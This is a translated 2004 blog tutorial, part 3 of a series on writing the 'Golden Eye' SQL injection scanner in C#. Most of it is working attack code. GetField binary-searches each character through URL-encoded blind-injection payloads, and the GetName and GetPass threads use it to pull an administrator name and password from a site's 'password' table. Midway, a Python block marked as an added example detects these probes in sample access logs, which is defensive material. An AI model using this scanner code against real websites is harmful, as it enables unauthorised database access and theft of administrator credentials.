Golden Eye - Writing an SQL Injection Scanner (3)
(Author: mikespook | Date: 2004-5-16 | Views: 72)
Keywords: Golden Eye, SQL Injection, Scanner, C#

Binary search ("folding in half") is the lookup method I use in Golden Eye 1.2 and 1.3, and it is very fast. The main measure of a lookup algorithm's quality is the number of comparisons it needs: we want to find the content we are looking for with the fewest comparisons. Below I give three formulas that quantify the speed of three lookup methods. You need not worry about where the formulas come from; interested readers can consult the "Data Structures" textbook published by Tsinghua University.

Sequential search: ASL = (N + 1) / 2. When N = 20, ASL = 11.
Indexed search: ASL = log2(N / S + 1) + S / 2. When N = 20 and S = 6, ASL = 9.
Binary search: ASL = log2(N + 1) - 1. When N = 20, ASL = 4.

The results are approximations. Here N is the total number of elements in the lookup table, S is the number of elements in one index block, and ASL is the average search length, that is, the average number of comparisons; the smaller this value, the faster the lookup. The figures above show the efficiency of binary search. In fact, the larger N is, the more obvious the speed advantage becomes: I have calculated that with 65535 elements, sequential search needs 32768 comparisons, while binary search completes the lookup in only 15.

In the previous part I introduced three functions that use these three lookup methods to get the field length. Now let's look at the implementation that retrieves the field content.
```csharp
// Get the character at position index of field in table by binary search over the
// ASCII range [l, h]. GetPage (defined in an earlier part of this series) returns
// true when the injected condition holds for the target page strPage.
private char GetField(string table, string field, int index, int l, int h)
{
    int nChar = 0;
    int low = l;
    int hig = h;
    int mid;
    // avoid an infinite loop: cap the number of lookups
    int tmp = h - l;
    while ((low <= hig) && (tmp != 0))
    {
        // compute the midpoint
        mid = (low + hig) / 2;
        // is the field value smaller than the midpoint value?
        if (this.GetPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20asc(mid(" + field + "," + index.ToString() + ",1))<" + mid.ToString() + ")"))
            // narrow the scan range
            hig = mid - 1;
        // is the field value greater than the midpoint value?
        else if (this.GetPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20asc(mid(" + field + "," + index.ToString() + ",1))>" + mid.ToString() + ")"))
            // narrow the scan range
            low = mid + 1;
        // is the field value equal to the midpoint value?
        else if (this.GetPage(strPage + "%20and%201=(select%20id%20from%20" + table + "%20where%20asc(mid(" + field + "," + index.ToString() + ",1))=" + mid.ToString() + ")"))
        {
            // found it
            nChar = mid;
            // leave the loop
            break;
        }
        // one fewer lookup allowed
        --tmp;
    }
    // return the character found; 0 means the lookup failed
    return (char)nChar;
}
```

I won't explain this in detail; it works much like the field-length function. See the comments.
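Each comparison in the function above is a separate HTTP request with a recognisable `and 1=(select ... where asc(mid(...)))` shape, which is what a defender should look for. The following is an added example, not code from the article, that flags this probe pattern in web server access logs; the log lines, client addresses and the `show.asp` page are constructed samples.

```python
# Added example, not from the article: flag blind-SQLi probes of the kind shown
# above in web server access logs. The log lines below are constructed samples.
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined-log-format lines (constructed): 10.0.0.7 runs the character-by-character
# probe against show.asp; 192.168.1.3 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.7 - - [16/May/2004:10:00:01 +0800] "GET /show.asp?id=5%20and%201=(select%20id%20from%20password%20where%20asc(mid(name,1,1))<79) HTTP/1.1" 200 512
10.0.0.7 - - [16/May/2004:10:00:02 +0800] "GET /show.asp?id=5%20and%201=(select%20id%20from%20password%20where%20asc(mid(name,1,1))>79) HTTP/1.1" 200 1984
10.0.0.7 - - [16/May/2004:10:00:03 +0800] "GET /show.asp?id=5%20and%201=(select%20id%20from%20password%20where%20asc(mid(name,1,1))=79) HTTP/1.1" 200 1984
10.0.0.7 - - [16/May/2004:10:00:04 +0800] "GET /show.asp?id=5%20and%201=(select%20id%20from%20password%20where%20asc(mid(name,2,1))<79) HTTP/1.1" 200 1984
192.168.1.3 - - [16/May/2004:10:00:05 +0800] "GET /show.asp?id=5 HTTP/1.1" 200 1984
192.168.1.3 - - [16/May/2004:10:00:06 +0800] "GET /index.asp HTTP/1.1" 200 3002
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')
# The probe template from the article after URL decoding:
#   and 1=(select id from <table> where asc(mid(<field>,<pos>,1)) <op> <value>)
PROBE_RE = re.compile(
    r"and\s+1\s*=\s*\(\s*select\s+\w+\s+from\s+(?P<table>\w+)\s+where\s+"
    r"asc\s*\(\s*mid\s*\(\s*(?P<field>\w+)\s*,\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*\)\s*"
    r"(?P<op>[<>=])\s*(?P<val>\d+)", re.IGNORECASE)

def parse_probe(url):
    """Return (table, field, position) if the URL carries the probe, else None."""
    m = PROBE_RE.search(unquote(url).replace("+", " "))
    if not m:
        return None
    return (m.group("table").lower(), m.group("field").lower(), int(m.group("pos")))

def analyze(log_text):
    """Per client: number of comparison queries and the (table, field, pos) tuples probed."""
    stats = defaultdict(lambda: {"probes": 0, "targets": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        hit = parse_probe(m.group("url")) if m else None
        if hit:
            stats[m.group("ip")]["probes"] += 1
            stats[m.group("ip")]["targets"].add(hit)
    return dict(stats)

def flag_clients(log_text, min_probes=3):
    """Clients that sent at least min_probes comparison queries. One extracted
    character costs several requests (up to three per binary-search step above),
    so even a low threshold catches a real scan while sparing normal traffic."""
    return sorted(ip for ip, s in analyze(log_text).items() if s["probes"] >= min_probes)
```

The number of distinct (table, field, position) tuples per client tells you how many characters the probe has already worked through, which is useful when scoping the incident.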
With a function that gets a field's length and one that gets a single character of a field's value, we can start writing the real scanning code, calling these functions to do the work we need. Here I do it with multiple threads. Since a thread function cannot take parameters, the following fields must be added to the Form class to pass parameters to the scan threads:

```csharp
private bool bNameOver;   // set to false when the administrator-name scan thread starts, true when it finishes
private bool bPassOver;   // set to false when the password scan thread starts, true when it finishes
private string strPage;   // the target page
```

Below is the thread function that scans the administrator name:

```csharp
public void GetName()
{
    int nNameLen;
    txtLog.Text += "Query administrator name length ...\u000d\u000a";
    // call GetFieldLen to get the administrator name length
    nNameLen = this.GetFieldLen("password", "name", 1, 20);
    txtLog.Text += "Administrator name length is: " + nNameLen.ToString() + "\u000d\u000a";
    // when the administrator name length is not 0
    if (!nNameLen.Equals(0))
    {
        txtLog.Text += "Query administrator name ...\u000d\u000a";
        // loop over the name length to get the administrator name character by character
        for (int j = 1; j <= nNameLen; j++)
        {
            txtLog.Text += "Query administrator name character " + j.ToString() + " ...\u000d\u000a";
            // call GetField to get the j-th character; characters are searched in ASCII range 33-126
            char cTmp = this.GetField("password", "name", j, 33, 126);
            // if GetField returns 0, the lookup failed
            if (!cTmp.Equals('\u0000'))
                txtName.Text += cTmp;
            else
            {
                txtLog.Text += "Administrator name query error!\u000d\u000a";
                break;
            }
        }
        txtLog.Text += "Administrator name query is completed!\u000d\u000a";
    }
    else
    {
        txtLog.Text += "Unable to query the available administrator name!\u000d\u000a";
    }
    // check whether the password scan has finished
    if (bPassOver)
    {
        // the password scan is also done, so re-enable btnOK
        btnOK.Enabled = true;
    }
    // set bNameOver to indicate that the administrator name scan has finished
    bNameOver = true;
}
```

The password-scanning thread function is the same:

```csharp
public void GetPass()
{
    int nPassLen;
    txtLog.Text += "Query password length ...\u000d\u000a";
    // call GetFieldLen to get the password length (the "pwd" field, matching the GetField call below)
    nPassLen = this.GetFieldLen("password", "pwd", 1, 50);
    txtLog.Text += "Password length is: " + nPassLen.ToString() + "\u000d\u000a";
    // when the password length is not 0
    if (!nPassLen.Equals(0))
    {
        txtLog.Text += "Query password ...\u000d\u000a";
        // loop over the password length to get the password character by character
        for (int j = 1; j <= nPassLen; j++)
        {
            txtLog.Text += "Query password character " + j.ToString() + " ...\u000d\u000a";
            // call GetField to get the j-th character; characters are searched in ASCII range 33-126
            char cTmp = this.GetField("password", "pwd", j, 33, 126);
            // if GetField returns 0, the lookup failed
            if (!cTmp.Equals('\u0000'))
                txtPass.Text += cTmp;
            else
            {
                txtLog.Text += "Password query error!\u000d\u000a";
                break;
            }
        }
        txtLog.Text += "Password query is completed!\u000d\u000a";
    }
    else
    {
        txtLog.Text += "Unable to query the available password!\u000d\u000a";
    }
    // check whether the administrator name scan has finished
    if (bNameOver)
    {
        // the administrator name scan is also done, so re-enable btnOK
        btnOK.Enabled = true;
    }
    // set bPassOver to indicate that the password scan has finished (mirrors GetName)
    bPassOver = true;
}
```